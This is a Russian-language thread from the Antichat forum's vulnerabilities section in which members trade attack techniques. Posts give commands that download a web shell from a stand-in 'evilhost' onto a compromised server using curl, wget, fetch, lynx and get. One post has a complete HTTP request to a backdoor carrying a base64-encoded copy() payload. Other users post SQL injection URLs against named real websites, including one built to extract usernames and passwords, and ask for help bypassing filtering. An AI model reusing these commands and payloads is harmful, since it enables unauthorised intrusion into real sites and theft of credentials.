HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16491  
Старый 03.03.2011, 16:03
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

качай курлом и записывай в файл

UPD: зачем ты юзаеш этот бекдор если не знаеш что оно делает?

вариантов море, eval()+file_get_contents(), copy(),wget, sockets, php_curl, system_curl
 
Ответить с цитированием

  #16492  
Старый 03.03.2011, 16:50
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию

Цитата:
Сообщение от noviyuser  
какие еще команды есть напободие wget?
curl, fetch, links, lynx, get

Проверить наличие качалок можно команой which.

В консоли: which curl, если качалка установлена, то в ответ получишь /usr/bin/curl (полный путь к исполняемому файлу на сервере)

Синтаксис:

get -o /path/shell.php http://site.com/shell.txt

fetch -o /path/shell.php http://site.com/shell.txt

curl --output /path/shell.php http://site.com/shell.txt

links -source http://site.com/shell.txt > /path/shell.php

lynx -source http://site.com/shell.txt > /path/shell.php

Цитата:
Сообщение от None  

можно ли этой командой залить полноценный шелл? можно примерчик?
Можно, зависит от настроек php.

Пример для allow_url_fopen = on (ну и функция copy разумеется не должна находиться в disable functions)

Посылаешь пакет:

Код HTML:
POST http://site.com/backdoor.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Keep-Alive: 115
Connection: keep-alive

e=Y29weSgnaHR0cDovL2V2aWxob3N0L3NoZWxsLnR4dCcsJy9zaXRlL3d3dy9zaGVsbC5waHAnKTs
где e=copy('http://evilhost/shell.txt','/site/www/shell.php'); в base64_encode

http://evilhost/shell.txt - откуда льем

/site/www/shell.php - куда (абсолютный путь до папки доступной на запись)
 
Ответить с цитированием

  #16493  
Старый 03.03.2011, 16:55
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

тама очень просто с курлом

Код:
curl http://evilhost/shell.php > /home/www/public_html/shell.php
 
Ответить с цитированием

  #16494  
Старый 04.03.2011, 00:26
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Помогите обойти фильтрацию.

http://www.footballfoundation.org/news.php?id=2194/**/union/**/select/**/1,2,3,4,5,6,7+--+
 
Ответить с цитированием

  #16495  
Старый 04.03.2011, 01:03
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
пост наше щастье
 
Ответить с цитированием

  #16496  
Старый 04.03.2011, 03:37
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Ребят конечно это не вопрос, но прошу помощи ... Нужны линки на книги по sql иньекциям, чтобы бы было разжевано от а до я ... желательно дб оракл и мускул, девтеева пдфки читал и ачат все явно устарело ... Не пинайте сильно.
 
Ответить с цитированием

  #16497  
Старый 04.03.2011, 03:53
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от Lijzer  
Ребят конечно это не вопрос, но прошу помощи ... Нужны линки на книги по sql иньекциям, чтобы бы было разжевано от а до я ... желательно дб оракл и мускул, девтеева пдфки читал и ачат все явно устарело ... Не пинайте сильно.
Эм... Способ эксплуатации SQL-inject'a не изменился и не думаю, что измениться. А если хочешь разобраться хорошо в разных SQL-языках, то читай книги по этим языкам и все. А для всего остального шпаргалки\статьи, которые есть на широких просторах интернета и в т.ч. на этом форуме.
 
Ответить с цитированием

  #16498  
Старый 04.03.2011, 17:13
DieWithMe
Новичок
Регистрация: 25.02.2011
Сообщений: 5
С нами: 8006006

Репутация: 0
По умолчанию

Помогите разобраться с sql-иньекциями.

С помощью сканера из этого топика нашел 10 уязвимостей на нужном мне сайте, большинство из них sql. Сам сканер в качестве уязвимой ссылки выдает что-то оканчивающееся на 0'+'1'=2. Пробовал подставлять вместо этого различные эксплоиты и просто кавычку, но показывается обычная страница, без всяких ошибок.

Собственно интересно, сканер врет или я что-то не то делаю... Как можно проверить на sql уязвимость кроме кавычки?
 
Ответить с цитированием

  #16499  
Старый 04.03.2011, 17:24
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

как говорил конки, спроси у сканера

а если по теме то https://forum.antichat.net/thread19844.html
 
Ответить с цитированием

  #16500  
Старый 04.03.2011, 18:34
DieWithMe
Новичок
Регистрация: 25.02.2011
Сообщений: 5
С нами: 8006006

Репутация: 0
По умолчанию

Судя по первому абзацу все-же сканер врет...

Сайт нагуглил по версии джумлы, вот линки на предполагаемые уязвимости

liceum9.ru/index.php?option=com_comprofiler&task=userProfile& user=1+and+1=2 юзеры начинаются с id 121, для их просмотра пришлось зарегится.

http://www.liceum9.ru/index.php?option=com_content&task=blogcategory&id= 60&Itemid=%2099999%20union%20select%201,concat_ws% 280x3a,username,password%29,%203,4,5%20from%20jos_ users/*

http://www.liceum9.ru/index.php?option=com_banners&task=archivesection&i d='0'+and+'1'='2

В последнем вообще валидный id подобрать не смог...

Проверьте, пожалуйста, эти ссылки на sql-уязвимость. Очень хочется, чтобы первый блин не вышел комом.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.